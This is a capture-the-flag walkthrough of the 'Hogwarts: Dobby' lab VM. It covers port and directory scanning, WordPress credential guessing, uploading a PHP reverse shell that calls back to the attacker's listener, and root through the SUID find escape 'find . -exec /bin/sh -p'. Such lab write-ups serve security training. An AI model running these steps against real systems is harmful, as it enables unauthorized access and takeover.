Howarts: Dobby
First steps port scanning withnmapor you can use recon to save extra time and continue with your other tasks
┌──(root@ghost)-[/home/ghost]
└─# recon dobby.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Can you boost me? Can you bring me the keys? Can you make an autopwn for me? Can you CVE-me? Can you? GatoGamer1155
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-11 18:59 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:59
Completed NSE at 18:59, 0.00s elapsed
Initiating ARP Ping Scan at 18:59
Scanning dobby.vuln (10.0.2.5) [1 port]
Completed ARP Ping Scan at 18:59, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:59
Scanning dobby.vuln (10.0.2.5) [65535 ports]
Discovered open port 80/tcp on 10.0.2.5
Completed SYN Stealth Scan at 18:59, 1.44s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.5.
Initiating NSE at 18:59
Completed NSE at 18:59, 0.00s elapsed
Nmap scan report for dobby.vuln (10.0.2.5)
Host is up (0.000069s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:DE:CB:F6 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 18:59
Completed NSE at 18:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [fuzzin server]
http://dobby.vuln [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], IP[10.0.2.5], Title[Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 11 18:59:59 2022
URL_BASE: http://dobby.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://dobby.vuln:80/ ----
+ http://dobby.vuln:80/index.html (CODE:200|SIZE:10977)
+ http://dobby.vuln:80/log (CODE:200|SIZE:45)
+ http://dobby.vuln:80/phpinfo.php (CODE:200|SIZE:83274)
+ http://dobby.vuln:80/server-status (CODE:403|SIZE:275)
-----------------
END_TIME: Mon Jul 11 19:00:01 2022
DOWNLOADED: 4612 - FOUND: 4
It seems there is only a webserver on port 80 http
┌──(root@ghost)-[/home/ghost]
└─# curl "http://dobby.vuln"
<!--
See: /alohomora
-->
┌──(root@ghost)-[/home/ghost]
└─# curl "http://dobby.vuln/alohomora/"
Draco's password is his house ;)
┌──(root@ghost)-[/home/ghost]
└─# curl "http://dobby.vuln/log"
pass:OjppbGlrZXNvY2tz
hint --> /DiagonAlley
After scrappin' some directories we obtain two dirs more, we can guess draco's password is slytherin, and an encoded base64 password, ilikesocks. Time to dig into DiagonAlley for more information, we will find a wordpress blog and should be a place to login
┌──(root@ghost)-[/home/ghost]
└─# whatweb "http://dobby.vuln/DiagonAlley/"
http://dobby.vuln/DiagonAlley/ [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], IP[10.0.2.5], JQuery, MetaGenerator[WordPress 5.5.3], Script[text/javascript], Title[Daily Prophet – News of wizard], UncommonHeaders[link], WordPress[5.5.3]
We are against a wordpress blog, we can use tools like wpscan and fuzz looking for wordpress directories
┌──(root@ghost)-[/home/ghost]
└─# wpscan -e u,p "http://dobby.vuln/DiagonAlley/"
[i] User(s) Identified:
[+] draco
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dobby.vuln/DiagonAlley/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] Draco
| Found By: Rss Generator (Passive Detection)
┌──(root@ghost)-[/home/ghost]
└─# dirb "http://dobby.vuln/DiagonAlley/" /usr/share/dirb/wordlists/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 11 19:51:03 2022
URL_BASE: http://dobby.vuln/DiagonAlley/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://dobby.vuln/DiagonAlley/ ----
+ http://dobby.vuln/DiagonAlley/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-includes/
+ http://dobby.vuln/DiagonAlley/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/ ----
+ http://dobby.vuln/DiagonAlley/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/css/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/images/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/includes/
+ http://dobby.vuln/DiagonAlley/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/js/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/maint/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/network/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-admin/user/
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/ ----
+ http://dobby.vuln/DiagonAlley/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/languages/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/plugins/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/themes/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/upgrade/
==> DIRECTORY: http://dobby.vuln/DiagonAlley/wp-content/uploads/
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/network/ ----
+ http://dobby.vuln/DiagonAlley/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://dobby.vuln/DiagonAlley/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-admin/user/ ----
+ http://dobby.vuln/DiagonAlley/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://dobby.vuln/DiagonAlley/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/plugins/ ----
+ http://dobby.vuln/DiagonAlley/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/themes/ ----
+ http://dobby.vuln/DiagonAlley/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dobby.vuln/DiagonAlley/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Jul 11 19:51:13 2022
DOWNLOADED: 32284 - FOUND: 11
We have enough information and finally a place to login. Now we are going to login in http://dobby.vuln/DiagonAlley/wp-login.php with user draco and password slytherin. Now it's time to upload our favourite php shell. I will use ShellStorm to generate one
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php
After uploading our rev.php as a new theme and setting up our netcat listener we should curl http://dobby.vuln/DiagonAlley/wp-content/uploads/2022/07/rev.php to execute it and gain our shell into the system
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.6] from dobby.vuln [10.0.2.5] 42946
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
02:30:10 up 2:47, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We are in the server, take user position should be easy by recycling passwords
www-data@HogWarts:/$ su dobby
Password:
dobby@HogWarts:/$ more /home/dobby/flag1.txt
"Harry potter this year should not go to the school of wizardry"
flag1{28327a4964cb391d74111a185a5047ad}
dobby@HogWarts:/$
Logged as dobby with password ilikesocks and here user's flag, time to elevate our privileges
dobby@HogWarts:/$ find / -type f -perm /6000 2>/dev/null
/usr/bin/su
/usr/bin/passwd
/usr/bin/crontab
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/base32
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/find
/usr/bin/expiry
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/write.ul
/usr/bin/mount
/usr/bin/wall
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
We are looking for suid programs and we found find command, interesting. Now checking gtfobins or gtfobins-webcrawler documentation we found some useful payload
dobby@HogWarts:/$ find . -exec /bin/sh -p \; -quit
# whoami
root
# ls -la /root
total 36
drwx------ 5 root root 4096 jul 11 23:48 .
drwxr-xr-x 20 root root 4096 nov 7 2020 ..
-rw------- 1 root root 162 nov 7 2020 .bash_history
-rw-r--r-- 1 root root 3106 ago 14 2019 .bashrc
drwx------ 2 root root 4096 oct 22 2020 .cache
drwxr-xr-x 3 root root 4096 nov 7 2020 .local
-rw-r--r-- 1 root root 161 sep 16 2020 .profile
-rw-r--r-- 1 root root 1359 nov 7 2020 proof.txt
drwx------ 3 root root 4096 jul 11 23:48 snap
# more /root/proof.txt
_ __
___ | ' \
___ \ / ___ ,'\_ | .-. \ /|
\ / | |,'__ \ ,'\_ | \ | | | | ,' |_ /|
_ | | | |\/ \ \ | \ | |\_| _ | |_| | _ '-. .-',' |_ _
// | | | |____| | | |\_|| |__ // | | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _ | | | | |\ \ // .| |\_/ | / \ || | | | / |\ \| \
`-. .-'| |/ / | | | | | | \ \// | | | | | || | | | | |_\ || |\_|
| | | || \_| | | | /_\ \ / | |` | | | || | | | | .---'| |
| | | |\___,_\ /_\ _ // | | | \_/ || | | | | | /\| |
/_\ | | //_____// .||` `._,' | | | | \ `-' /| |
/_\ `------' \ | AND `.\ | | `._,' /_\
\| THE `.\
_ _ _ _ __ _ __ _ /_
(_`/ \|_)/ '|_ |_)|_ |_)(_
._)\_/| \\_,|__| \|__| \ _)
_ ___ _ _
(_` | / \|\ ||__
._) | \_/| \||___
root{63a9f0ea7bb98050796b649e85481845!!}